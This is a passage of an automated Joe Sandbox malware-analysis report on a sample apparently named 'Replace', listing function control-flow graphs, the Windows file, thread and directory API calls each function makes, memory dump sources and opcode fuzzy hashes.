                                                                                                                                                                                                              • API String ID: 2758541657-0
                                                                                                                                                                                                              • Opcode ID: 9949b24176f72a055e933126e9911cfb02ecbe7527aa9bcfe78839027946de5f
                                                                                                                                                                                                              • Instruction ID: 54cc57136c4bea32d34255e32c96e7704763edd4870e6da9d3f77a6e01856451
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9949b24176f72a055e933126e9911cfb02ecbe7527aa9bcfe78839027946de5f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9014831140B009FE7215B24D859BAABBE6BB44720F10461EF2A2969F0DFB2A9528B10
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 850 bd04b7-bd04c2 851 bd04d8-bd04eb call bd0467 850->851 852 bd04c4-bd04d7 call bd1b8b call bd1ace 850->852 857 bd04ed-bd050a CreateThread 851->857 858 bd0519 851->858 860 bd050c-bd0518 GetLastError call bd1b55 857->860 861 bd0528-bd052d 857->861 862 bd051b-bd0527 call bd03d9 858->862 860->858 866 bd052f-bd0532 861->866 867 bd0534-bd0538 861->867 866->867 867->862
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNELBASE(-00000086,?,00BD035B,00000000,?,-00000086), ref: 00BD0500
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,000000A4,00BCB95B,-000000EA,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BD050C
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00BD0513
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2744730728-0
                                                                                                                                                                                                              • Opcode ID: 6ffaef975b29e6003ccfd2a0c81653f806ddc91e34cde55e5daf60f3918acdcb
                                                                                                                                                                                                              • Instruction ID: 82b3c966ad746d3019a9d7899e821e41016f48153af0e7d355227a20a5c5cf67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ffaef975b29e6003ccfd2a0c81653f806ddc91e34cde55e5daf60f3918acdcb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76016972521209AFDF15AFA4EC55AAEBBE4EF40324F00409AF901A2250FB70DA40DBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 870 bb23a3-bb23c9 SetFilePointer 871 bb23cb-bb23d5 GetLastError 870->871 872 bb23ec-bb23fe 870->872 871->872 873 bb23d7-bb23ea call bb2351 SetLastError 871->873 874 bb2400-bb2404 872->874 873->874
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?), ref: 00BB23BE
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 00BB23CB
                                                                                                                                                                                                                • Part of subcall function 00BB2351: SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 00BB2365
                                                                                                                                                                                                                • Part of subcall function 00BB2351: GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00BB2372
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?), ref: 00BB23E2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1156039329-0
                                                                                                                                                                                                              • Opcode ID: 54d52ad155303a754468856698bf2ed1d2665ef81f93d9968c171a1582c13f47
                                                                                                                                                                                                              • Instruction ID: 7ccf8615991e268a237233d9564619b493f170fd0719fd18e2176d4075f4b0db
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 54d52ad155303a754468856698bf2ed1d2665ef81f93d9968c171a1582c13f47
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B801DC36200108EFCB059F68EC94EEFBBF9EF48320B158166F91697350DB718D11AB64
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD20CB: GetLastError.KERNEL32(00000072,-00000086,00000001,00BD1B90,00BD27C0,-00000126,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD20D0
                                                                                                                                                                                                                • Part of subcall function 00BD20CB: SetLastError.KERNEL32(00000000,00000005,000000FF,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD216E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00BD0547,?,?,00BD03B9,00000000), ref: 00BD0441
                                                                                                                                                                                                              • FreeLibraryAndExitThread.KERNELBASE(?,?,?,?,00BD0547,?,?,00BD03B9,00000000), ref: 00BD0457
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD0460
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1991824761-0
                                                                                                                                                                                                              • Opcode ID: 0ea5eaf86951c73a7cf631829eb7ea6c54234cb5395d78d0be641d9069bd63da
                                                                                                                                                                                                              • Instruction ID: 17422961e8b6452f7e67d28a620f7574768ba27a4f4e1427ab625ce06816d413
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ea5eaf86951c73a7cf631829eb7ea6c54234cb5395d78d0be641d9069bd63da
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F03030511641ABCB312B65980CF5BBBE8EF01360F058A96BA39C33A0FB20D841CA90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,00000000,00000000,?), ref: 00BC6AB6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileTime
                                                                                                                                                                                                              • String ID: Unsupported Method
                                                                                                                                                                                                              • API String ID: 1425588814-3491066157
                                                                                                                                                                                                              • Opcode ID: d47bebba22e0a20bdf14dbb0aa3276af15720d997b46299269758e1eed13b0a8
                                                                                                                                                                                                              • Instruction ID: 831557613fef97fd619a914a8f40f155f52c0d4ae85645f363a66572086c4a45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d47bebba22e0a20bdf14dbb0aa3276af15720d997b46299269758e1eed13b0a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 791128312107509FD724DB2AC858FA7B7F5FF84700B0588ADA596A7621D7B2E846CB11
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,0000000A,00000032,Extracting,?,?,?,?,-00000086,000001E4), ref: 00BC62DB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                              • String ID: Extracting
                                                                                                                                                                                                              • API String ID: 2962429428-356925411
                                                                                                                                                                                                              • Opcode ID: 4200ce684b01d8413af5203f6464ae9de92a1b3f41b9c60c14d6d937d48cb1c5
                                                                                                                                                                                                              • Instruction ID: d63b7f41eab78c4a28a70401344b72f0ccedb20e0c7732237d705dd5e3cd41b8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4200ce684b01d8413af5203f6464ae9de92a1b3f41b9c60c14d6d937d48cb1c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C515970900259DFDB25EFA8C855FEEBBF4AF19304F5440DEE409A7242DBB09A44CB52
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(-0000000E,?,00000000,?,00000000), ref: 00BB36BF
                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(-0000000E,?,00000000,?,00000000), ref: 00BB36E4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFindNext
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2029273394-0
                                                                                                                                                                                                              • Opcode ID: 2501d0c80630b2d7a23a331f80979134f782546106250a2a79daa65c868c76b0
                                                                                                                                                                                                              • Instruction ID: ea4fbb0072d4fede37d60993010d785a32178e9059916146f8036e12377aca28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2501d0c80630b2d7a23a331f80979134f782546106250a2a79daa65c868c76b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0521D1B12082009BDB319B21D895EFBB7E9EF85B10F14469AD45287290EFB1EE06D781
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00BBE9A8,?,?), ref: 00BBEB4B
                                                                                                                                                                                                                • Part of subcall function 00BB456E: GetLastError.KERNEL32(00BB45F3,?,000000A4,00BCB95B,-000000EA,?,-00000088,-0000009A,-000000CA,-000000CA), ref: 00BB456E
                                                                                                                                                                                                              • ResetEvent.KERNEL32(?,?,?,00BBE9A8,?,?), ref: 00BBEB6F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventReset$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4016784251-0
                                                                                                                                                                                                              • Opcode ID: ca247e5ca24d7ff21a46dfac626672655cbaca3cefd1404ff99e96ee05da33e1
                                                                                                                                                                                                              • Instruction ID: 974bc91cf7c2a16f15151b7c3c43c8df3387ae1159c132a090615a1ad9477470
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca247e5ca24d7ff21a46dfac626672655cbaca3cefd1404ff99e96ee05da33e1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9015A30216601AFE730AAB58CD1EFBB7D8EF24354B1444EEE52781572EBE1DC44DA62
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB30F3: GetFileAttributesA.KERNEL32(00000000), ref: 00BB310F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000,?,?,-00000086,000001E4), ref: 00BB288A
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,?,-00000086,000001E4), ref: 00BB28A0
                                                                                                                                                                                                                • Part of subcall function 00BB2575: SetFileAttributesA.KERNEL32(00000000,00000000,?,?,-00000086,000001E4), ref: 00BB2594
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesDelete
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2910425767-0
                                                                                                                                                                                                              • Opcode ID: 4975771c5734a2b2cc66b5fdcb21b2ece228eaa6ebd1ef13a12db53ecf965cc8
                                                                                                                                                                                                              • Instruction ID: f16954750fea064181c08e9a5a8056900f11a326fee2a79580da0d5a3acc635d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4975771c5734a2b2cc66b5fdcb21b2ece228eaa6ebd1ef13a12db53ecf965cc8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBF0C231D10514A7DF3027749C56BFE33C59F56320F1047E6A821A71E5EFE5C8468280
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB22EF: FindCloseChangeNotification.KERNELBASE(-0000002A,-0000002A,00BB228C), ref: 00BB22F9
                                                                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22DC
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Create$ApisChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2652355470-0
                                                                                                                                                                                                              • Opcode ID: 277f36a49395a9a398a296f49fb52b9d9b5180e16b2a2cf3030d13096b199273
                                                                                                                                                                                                              • Instruction ID: 8356d390d9b5273142d0820975e474fbcf0d775492131bd9c0e8b61d609a757a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 277f36a49395a9a398a296f49fb52b9d9b5180e16b2a2cf3030d13096b199273
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6601FB3640020AFFCF216FA0DC06FDE7FA2EF18314F108596FA51661A1DBB195A5EB94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(00BE47D8,0000000C), ref: 00BD036E
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD0375
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorExitLastThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1611280651-0
                                                                                                                                                                                                              • Opcode ID: e8a8d1e0c0cc1a43f23bc779586ca4fdf21085f1be0b32a375da5a4644525a09
                                                                                                                                                                                                              • Instruction ID: 7a72f75a5452bbde0fe7036a1218b09ae617b4eab63e28326a61f66cdc942ad2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8a8d1e0c0cc1a43f23bc779586ca4fdf21085f1be0b32a375da5a4644525a09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DEF08C71910241AFDB04BBB0C81AF6EBBB4EF55310F11418AF4159B362EF30A941CBA0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00BB7B59
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,00000000), ref: 00BB7B7F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 530164218-0
                                                                                                                                                                                                              • Opcode ID: e9f6e79d3ce52b99b1c2d32fcb26d7469ccc14bb5820c612b269d573ffb1549c
                                                                                                                                                                                                              • Instruction ID: b46927aac985a366f0495caf85a3c43bfabd82babd4a2c4595b7b22a71381b44
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9f6e79d3ce52b99b1c2d32fcb26d7469ccc14bb5820c612b269d573ffb1549c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A9F09032801116EBCB11ABA0D856FEEBBF1AF04350F4144D9F2017B2A0EF755A44DB90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,?,?,-00000086,000001E4), ref: 00BB25AB
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,?,?,-00000086,000001E4), ref: 00BB2594
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Attributes$Apis
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2164219574-0
                                                                                                                                                                                                              • Opcode ID: 8b9124f28afc0801163203b124652f4aab3eb19c0ba868bfc750cbdeb617fb00
                                                                                                                                                                                                              • Instruction ID: 7ca6c59fc5714bf6333d64abdf3fe099f1a8075d079fe06f9346b62eb9ac1f56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b9124f28afc0801163203b124652f4aab3eb19c0ba868bfc750cbdeb617fb00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E09239D05121A7CF352B75AD2AEEF7BE8DF22710B1042E6EC1267261EFA0C905D6D1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00BB263A
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 00BB2621
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateDirectory$ApisFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2873393970-0
                                                                                                                                                                                                              • Opcode ID: beed321fa8d808596a17e2ce7b9cb29c5d8044aa2e79dce5aae3a83db6de0b2c
                                                                                                                                                                                                              • Instruction ID: 40b36d01f14ea0443932bff76ca73c215e571309fccb79fca4615c5e66a7f57c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: beed321fa8d808596a17e2ce7b9cb29c5d8044aa2e79dce5aae3a83db6de0b2c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66E09235A00255ABCF212B74AC26FEE77E49B01744F5446D9E912BB1E0DFB4D805D780
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,?,-00000086,000001E4), ref: 00BB25F1
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(00000000,?,?,-00000086,000001E4), ref: 00BB25DA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
